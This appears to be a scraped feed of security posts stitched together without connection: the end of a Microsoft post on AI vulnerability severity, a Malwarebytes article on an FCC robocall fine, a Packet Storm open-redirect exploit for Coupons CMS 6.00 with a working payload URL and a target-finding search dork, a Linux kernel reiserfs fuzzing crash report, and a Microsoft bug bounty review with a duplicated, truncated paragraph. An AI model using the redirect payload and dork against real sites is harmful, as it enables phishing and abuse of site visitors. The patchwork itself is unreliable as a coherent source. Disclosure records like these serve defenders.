The new vulnerability categories above have many similarities with recently published taxonomies, such as the MITRE ATLAS, the OWASP Top 10 for Large Language Model Applications and the NIST Adversarial Machine Learning taxonomy, but are not always one-to-one mappings. For example, several of the security challenges in the new OWASP Top 10 for LLMs map directly to the new categories above, whilst others are already covered by existing vulnerability categories in our bug bar, which automatically also apply to AI systems and services. Additionally, the new vulnerability categories we are introducing above are not limited to LLMs – they are intended to cover all AI modalities. Overall, we see these new categories as being complementary to the existing taxonomies.

**Going Forward Going Forward**

We recognize that this initial update may not incorporate all possible AI-specific vulnerability types, and that new vulnerability types may be discovered at any time. We will continue to monitor this space and add or update vulnerability types as needed. We value the partnership of external researchers who find and report security vulnerabilities to help us protect billions of customers. We hope these resources make it easier to understand the reasoning behind our vulnerability severity classification and assist researchers in focussing their efforts on the highest impact areas. If you have any questions about the new vulnerability classification guide or MSRC, please visit our FAQ page or contact secure@microsoft.com.

_\* All vulnerability descriptions and examples in this article are for reference only. For the normative definitions, please refer to the Microsoft Vulnerability Severity Classification for AI Systems._

Updating our Vulnerability Severity Classification for AI Systems

Categories: Personal
Tags: FCC

Tags:  FTC

Tags:  robocall

Tags:  cold caller

Tags:  calling

Tags:  phone

Tags:  do not call

Tags:  block

Tags:  fine

We take a look at a record fine issued by the FCC in relation to a prolific robocalling operation.



(Read more...)




The post FCC comes down hard on robocallers with record $300m fine appeared first on Malwarebytes Labs.

Robocallers are in the news after the FCC issued a $300 million forfeiture to a persistent offender and shut down their operation.

A robocall network makes use of automated software diallers to spam out large numbers of cold calls to unsuspecting recipients. These calls promise much but give very little. Anyone taking the bait stands a good chance of losing control of their personal data or suffering from all manner of dubious payments leaving their bank account.

Cold calling has been associated with scam tactics for decades, and the growing number of ways to combat these techniques (like Do Not Call lists) are routinely ignored by the robocallers. This has, inevitably, brought us to our eye-wateringly large $300m fine aimed squarely at one of the most persistent robocalling operations yet seen.

From the official statement(s) regarding the record penalty:

> The Federal Communications Commission today issued a record-breaking $299,997,000 fine for auto warranty scam robocalls made by the largest illegal robocall operation the agency has ever investigated. An international network of companies violated federal statutes and the Commission’s regulations when they executed a scheme to make more than five billion robocalls to more than 500 million phone numbers during a three-month span in 2021, including violating federal spoofing laws by using more than one million different caller ID numbers in an attempt to disguise the true origin of the robocalls and trick victims into answering the phone.
> 
> The enterprise violated a multitude of robocall prohibitions by making pre-recorded voice calls to mobile phones without prior express consent, placing telemarketing calls without written consent, dialing numbers included on the National Do Not Call Registry, failing to identify the caller at the start of the message, and failing to provide a call-back number that allowed consumers to opt out of future calls. The calls also violated spoofing laws by using misleading caller ID to disguise the enterprise’s role and prompt consumers to answer.

Insurance, claims, and compensation are all robocall topics you should avoid when the phone inevitably rings. This kind of call will never quite go to plan for anyone other than the individuals operating the robocalling software.

In this case, the bait being used was the claim of auto warranties in return for the collection of personal data from call recipients.

TechCrunch notes that the robocalls “exhibited the standard robocall characteristics” of failing to identify the caller, spoofing area codes, and ignoring various consent laws like the Do Not Call list.

No fewer than an astonishing five billion calls were made by the companies responsible for this operation. Members of the FCC themselves received some of these calls, which on reflection seems like a very poor decision made by the robocalling technology.

The FCC explains the sheer scale of the operation, alongside some of the tactics used to shut it down permanently:

> Since at least 2018, this enterprise operated a complex scheme designed to facilitate the sale of vehicle service contracts under the false and misleading claim of selling auto warranties. Two of the central players of the operation, Roy M. Cox and Aaron Michael Jones, were under lifetime bans against making telemarketing calls following lawsuits by the Federal Trade Commission and State of Texas.  The multi-national enterprise did business as Sumco Panama, Virtual Telecom, Davis Telecom, Geist Telecom, Fugle Telecom, Tech Direct, Mobi Telecom, and Posting Express.
> 
> Last year, to stop this then-ongoing telemarketing campaign in its tracks, the FCC directed all U.S.-based voice service providers to cease carrying traffic associated with certain members of the enterprise.  As a result, these illegal auto warranty robocalls dropped by 99%. That enforcement action was taken in coordination with the Ohio Attorney General’s Office, which brought a lawsuit under the Telephone Consumer Protection Act against several entities and individuals associated with the enterprise. The Commission also proposed a fine and offered the parties a chance to respond, which they did not do, resulting in today’s unprecedented fine. Should the parties not pay the fine promptly, this matter will be referred to the U.S. Department of Justice for collection.

Sadly it remains to be seen whether the eye-watering fine will be enforced and those responsible made to pay up. Robocalling is so popular that even with such massive fines being thrown around, people making use of it will not simply abandon ship. We'll be stuck with all manner of robocalling technology for some time to come.

Back to the FCC:

> What happens next?  Under the law we will refer this Forfeiture Order to the Department of Justice to collect payment.  I hope, however, that Congress will consider giving the FCC authority to go to court and collect these fines ourselves. In the meantime, we will keep using the tools we have to hold those behind fraudulent calling schemes accountable. In fact, just this week the Enforcement Bureau identified another source of illegal robocalls and we have put all phone companies on notice they can block these calls.  We know the scam artists behind these calls are relentless—but we are coming for them and won’t stop until we get this junk off the line.  

Sounds good! In the meantime though, you’ll have to take some action of your own to help ward off the threat posed by robocallers. Entities such as the FCC can and will go into battle on your behalf, but we can speed things along by doing our part too.

**What you can do to stem the tide of robocalling**

*   Report the call to the FCC, Federal Trade Commission (FTC), and your attorney general. Doing so will help the collective efforts of regulators and phone companies in blocking these numbers.
*   Do not give out your number online or post it publicly in your social media profiles. They will likely be collected by scammers.
*   Some apps can help analyse the calls you receive and respond or reroute the call effectively. Your mobile provider may already include this technology in their network, so it’s worth asking before opening up your iOS or Android store. Additionally, the FCC passed a rule that gives phone companies the power to proactively block numbers that do not or cannot make outgoing calls.
*   Go old-school by turning off your landline's ringer and then feeding the call to an answering machine with a caller ID. You can always return the call if you have determined that the caller is using a legitimate number or has actually left a message worth returning.
*   If you happen to pick up a call from a robocaller, hang up immediately and don’t say anything down the line because it's almost certainly being recorded.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

FCC comes down hard on robocallers with record $300m fine

Coupons CMS version 6.00 suffers from an open redirection vulnerability.

**Coupons CMS 6.00 Open Redirection**

Posted Aug 7, 2023

Authored by indoushka

Coupons CMS version 6.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 6f1d614850036145fc311bc9ae50d863cc9b83863f612a7fda85ed6a6e596b35

Download | Favorite | View

**Coupons CMS 6.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v6.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,889)
*   Arbitrary (16,186)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,341)
*   DoS (23,405)
*   Encryption (2,369)
*   Exploit (51,802)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,765)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,688)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,600)
*   Python (1,534)
*   Remote (30,742)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,354)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,754)
*   Web (9,655)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,919)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,807)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,382)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,683)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,797)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Coupons CMS 6.00 Open Redirection

An out-of-bounds memory access flaw was found in the Linux kernel’s do_journal_end function when the fails array-index-out-of-bounds in fs/reiserfs/journal.c could happen. This flaw allows a local user to crash the system.

Hello,

When using Healer to fuzz the latest Linux kernel, the following crash
was triggered.

HEAD commit: fdf0eaf11452d72945af31804e2a1048ee1b574c (tag: v6.5-rc2)

git tree: upstream

console output:
https://drive.google.com/file/d/1rvB5Fwc85GjfGwkk0bcYKZksB5l-\_nOX/view?usp=drive\_link
kernel config: https://drive.google.com/file/d/1V146PezNdRzu1BRVfwwYsIwNCZvAOBxJ/view?usp=drive\_link
C reproducer: https://drive.google.com/file/d/1FLDqzxv4t92J7EMPqQdkg6ca6XtZJhCd/view?usp=drive\_link
Syzlang reproducer:
https://drive.google.com/file/d/1uPPRLIylpS116iXrlHMzKNga-fBwRAo1/view?usp=drive\_link
Similar report:
https://groups.google.com/g/syzkaller-bugs/c/osuwOxyjReQ/m/-FJKSzllAQAJ

If you fix this issue, please add the following tag to the commit:
Reported-by: Yikebaer Aizezi <yikebaer61@xxxxxxxxx>

UBSAN: array-index-out-of-bounds in fs/reiserfs/journal.c:4166:22
index 1 is out of range for type '\_\_le32 \[1\]'
CPU: 0 PID: 8058 Comm: syz-executor Not tainted 6.5.0-rc2 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0xd4/0xf0 lib/dump\_stack.c:106
 ubsan\_epilogue lib/ubsan.c:217 \[inline\]
 \_\_ubsan\_handle\_out\_of\_bounds+0xbf/0x100 lib/ubsan.c:348
 do\_journal\_end+0x3b3c/0x4750 fs/reiserfs/journal.c:4166
 reiserfs\_sync\_fs+0xe7/0x100 fs/reiserfs/super.c:78
 sync\_filesystem fs/sync.c:56 \[inline\]
 sync\_filesystem+0xef/0x250 fs/sync.c:30
 generic\_shutdown\_super+0x70/0x470 fs/super.c:472
 kill\_block\_super+0x60/0xb0 fs/super.c:1417
 deactivate\_locked\_super+0x85/0x140 fs/super.c:330
 deactivate\_super+0x8c/0xa0 fs/super.c:361
 cleanup\_mnt+0x28f/0x3b0 fs/namespace.c:1254
 task\_work\_run+0x153/0x230 kernel/task\_work.c:179
 resume\_user\_mode\_work include/linux/resume\_user\_mode.h:49 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:171 \[inline\]
 exit\_to\_user\_mode\_prepare+0x210/0x240 kernel/entry/common.c:204
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:286 \[inline\]
 syscall\_exit\_to\_user\_mode+0x19/0x50 kernel/entry/common.c:297
 do\_syscall\_64+0x42/0xb0 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
RIP: 0033:0x47afab
Code: 5f ff d0 48 89 c7 b8 3c 00 00 00 0f 05 48 c7 c1 b4 ff ff ff f7
d8 64 89 01 48 83 c8 ff c3 90 f3 0f 1e fa b8 a6 00 00 00 0f 05 <48> 3d
00 f0 ff ff 77 05 c3 0f 1f 40 00 48 c7 c2 b4 ff ff ff f7 d8
RSP: 002b:00007ffe61655568 EFLAGS: 00000246 ORIG\_RAX: 00000000000000a6
RAX: 0000000000000000 RBX: 00000000000001fc RCX: 000000000047afab
RDX: 0000000000000000 RSI: 0000000000000002 RDI: 00007ffe61655610
RBP: 0000000000000000 R08: 0000000000000000 R09: 00007ffe61655400
R10: 00000000025d1b03 R11: 0000000000000246 R12: 00007ffe616566d0
R13: 00000000025d1a70 R14: 0000000000000000 R15: 00007ffe61656710
 </TASK>
================================================================================

TITLE: kernel panic: UBSAN: panic\_on\_warn set ...
CORRUPTED: false ()
MAINTAINERS (TO): \[reiserfs-devel@xxxxxxxxxxxxxxx\]
MAINTAINERS (CC): \[linux-kernel@xxxxxxxxxxxxxxx\]

index 1 is out of range for type '\_\_le32 \[1\]'
CPU: 0 PID: 8058 Comm: syz-executor Not tainted 6.5.0-rc2 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0xd4/0xf0 lib/dump\_stack.c:106
 ubsan\_epilogue lib/ubsan.c:217 \[inline\]
 \_\_ubsan\_handle\_out\_of\_bounds+0xbf/0x100 lib/ubsan.c:348
 do\_journal\_end+0x3b3c/0x4750 fs/reiserfs/journal.c:4166
 reiserfs\_sync\_fs+0xe7/0x100 fs/reiserfs/super.c:78
 sync\_filesystem fs/sync.c:56 \[inline\]
 sync\_filesystem+0xef/0x250 fs/sync.c:30
 generic\_shutdown\_super+0x70/0x470 fs/super.c:472
 kill\_block\_super+0x60/0xb0 fs/super.c:1417
 deactivate\_locked\_super+0x85/0x140 fs/super.c:330
 deactivate\_super+0x8c/0xa0 fs/super.c:361
 cleanup\_mnt+0x28f/0x3b0 fs/namespace.c:1254
 task\_work\_run+0x153/0x230 kernel/task\_work.c:179
 resume\_user\_mode\_work include/linux/resume\_user\_mode.h:49 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:171 \[inline\]
 exit\_to\_user\_mode\_prepare+0x210/0x240 kernel/entry/common.c:204
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:286 \[inline\]
 syscall\_exit\_to\_user\_mode+0x19/0x50 kernel/entry/common.c:297
 do\_syscall\_64+0x42/0xb0 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
RIP: 0033:0x47afab
Code: 5f ff d0 48 89 c7 b8 3c 00 00 00 0f 05 48 c7 c1 b4 ff ff ff f7
d8 64 89 01 48 83 c8 ff c3 90 f3 0f 1e fa b8 a6 00 00 00 0f 05 <48> 3d
00 f0 ff ff 77 05 c3 0f 1f 40 00 48 c7 c2 b4 ff ff ff f7 d8
RSP: 002b:00007ffe61655568 EFLAGS: 00000246 ORIG\_RAX: 00000000000000a6
RAX: 0000000000000000 RBX: 00000000000001fc RCX: 000000000047afab
RDX: 0000000000000000 RSI: 0000000000000002 RDI: 00007ffe61655610
RBP: 0000000000000000 R08: 0000000000000000 R09: 00007ffe61655400
R10: 00000000025d1b03 R11: 0000000000000246 R12: 00007ffe616566d0
R13: 00000000025d1a70 R14: 0000000000000000 R15: 00007ffe61656710
 </TASK>
================================================================================
Kernel panic - not syncing: UBSAN: panic\_on\_warn set ...
CPU: 0 PID: 8058 Comm: syz-executor Not tainted 6.5.0-rc2 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014
Call Trace:
 <TASK>
 \_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
 dump\_stack\_lvl+0x92/0xf0 lib/dump\_stack.c:106
 panic+0x570/0x620 kernel/panic.c:340
 check\_panic\_on\_warn+0x8e/0x90 kernel/panic.c:236
 ubsan\_epilogue lib/ubsan.c:223 \[inline\]
 \_\_ubsan\_handle\_out\_of\_bounds+0xe7/0x100 lib/ubsan.c:348
 do\_journal\_end+0x3b3c/0x4750 fs/reiserfs/journal.c:4166
 reiserfs\_sync\_fs+0xe7/0x100 fs/reiserfs/super.c:78
 sync\_filesystem fs/sync.c:56 \[inline\]
 sync\_filesystem+0xef/0x250 fs/sync.c:30
 generic\_shutdown\_super+0x70/0x470 fs/super.c:472
 kill\_block\_super+0x60/0xb0 fs/super.c:1417
 deactivate\_locked\_super+0x85/0x140 fs/super.c:330
 deactivate\_super+0x8c/0xa0 fs/super.c:361
 cleanup\_mnt+0x28f/0x3b0 fs/namespace.c:1254
 task\_work\_run+0x153/0x230 kernel/task\_work.c:179
 resume\_user\_mode\_work include/linux/resume\_user\_mode.h:49 \[inline\]
 exit\_to\_user\_mode\_loop kernel/entry/common.c:171 \[inline\]
 exit\_to\_user\_mode\_prepare+0x210/0x240 kernel/entry/common.c:204
 \_\_syscall\_exit\_to\_user\_mode\_work kernel/entry/common.c:286 \[inline\]
 syscall\_exit\_to\_user\_mode+0x19/0x50 kernel/entry/common.c:297
 do\_syscall\_64+0x42/0xb0 arch/x86/entry/common.c:86
 entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
RIP: 0033:0x47afab
Code: 5f ff d0 48 89 c7 b8 3c 00 00 00 0f 05 48 c7 c1 b4 ff ff ff f7
d8 64 89 01 48 83 c8 ff c3 90 f3 0f 1e fa b8 a6 00 00 00 0f 05 <48> 3d
00 f0 ff ff 77 05 c3 0f 1f 40 00 48 c7 c2 b4 ff ff ff f7 d8
RSP: 002b:00007ffe61655568 EFLAGS: 00000246 ORIG\_RAX: 00000000000000a6
RAX: 0000000000000000 RBX: 00000000000001fc RCX: 000000000047afab
RDX: 0000000000000000 RSI: 0000000000000002 RDI: 00007ffe61655610
RBP: 0000000000000000 R08: 0000000000000000 R09: 00007ffe61655400
R10: 00000000025d1b03 R11: 0000000000000246 R12: 00007ffe616566d0
R13: 00000000025d1a70 R14: 0000000000000000 R15: 00007ffe61656710
 </TASK>
Dumping ftrace buffer:
   (ftrace buffer empty)
Kernel Offset: disabled
Rebooting in 1 seconds..

CVE-2023-4205: Linux Kernel: UBSAN array-index-out-of-bounds in do_journal_end

We are thrilled to share the results of our collaboration with over 345 security researchers from +45 countries around the world in the past 12 months. Together, we have discovered and fixed more than a thousand potential security issues before they impacted our customers. In recognition of this valuable collaboration, we have awarded $13.

We are thrilled to share the results of our collaboration with over 345 security researchers from +45 countries around the world in the past 12 months. Together, we have discovered and fixed more than a thousand potential security issues before they impacted our customers. In recognition of this valuable collaboration, we have awarded $13.8M as part of the industry-leading Microsoft Bug Bounty Program.

Microsoft Bug Bounty Programs are an essential part of our proactive strategy to protect our customers from security threats. These programs incentivize researchers to find vulnerabilities in high-priority areas, helping Microsoft stay ahead of the curve in the ever-evolving security landscape and emerging technologies. By following Coordinated Vulnerability Disclosure, security researchers make a vital contribution to enhancing the security that millions of Microsoft customers rely on.

The bounty programs span across products and services such as Azure, Edge, M365, Dynamics 365 and Power Platform, Windows, Xbox, and more. Each program has its own scope, eligibility criteria, award range, and submission guidelines to help researchers pursue impactful research without causing unintended harm. These guidelines are tailored to the specific threat model of each product or domain. For detailed information on each program, please visit the Microsoft Bug Bounty Programs website.

**Bounty updates**

We have continued to grow and evolve the Bug Bounty and Research programs in the past 12 months to cover new products, integrations, and expand scope in critical areas, including:

*   Intune Bug Bounty research invitation challenge July 2022
*   New high-impact research scenarios added to the Microsoft 365 Insider Builds on Windows Bounty Program January 2023
*   Microsoft Teams Preview Bug Bounty research invitation challenge January 2023
*   New Bing Bug Bounty research invitation challenge March 2023
*   New severity classification for Online Services added to the Microsoft 365 Bounty Program April 2023
*   New scope added to the Identity Bounty Program June 2023
*   Secure boot research scenarios added to Windows Insider Preview Bounty Program July 2023

**Bounty awards**

Bounty awards are based on the severity and security impact of the bug, as well as the completeness and accuracy of the report. Awards are also aligned with the areas that matter most to our customers, to encourage research in these high-impact areas.

In the coming year we will continue to improve our programs based on your feedback. We appreciate our global security research community for their ongoing partnership and for sharing their expertise to help secure millions of Microsoft customers.

We look forward to strengthening our existing relationships and building new ones.

Stay Secure & Happy Hunting!

Bruce Robinson, Lynn Miyashita, and Madeline Eckert

Microsoft Bug Bounty Team

Microsoft Bug Bounty Program Year in Review: $13.8M in Rewards

Categories: News
Tags: Ivanti

Tags:  Meta

Tags:  Teams

Tags:  ransomware rollback

Tags:  AMP

Tags:  Minecraft

Tags:  Barracuda

A list of topics we covered in the week of July 31 to August 6 of 2023



(Read more...)




The post A week in security (July 31 - August 6) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner  

Free Password Generator

Anti Ransomware Protection

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

Tag

#ios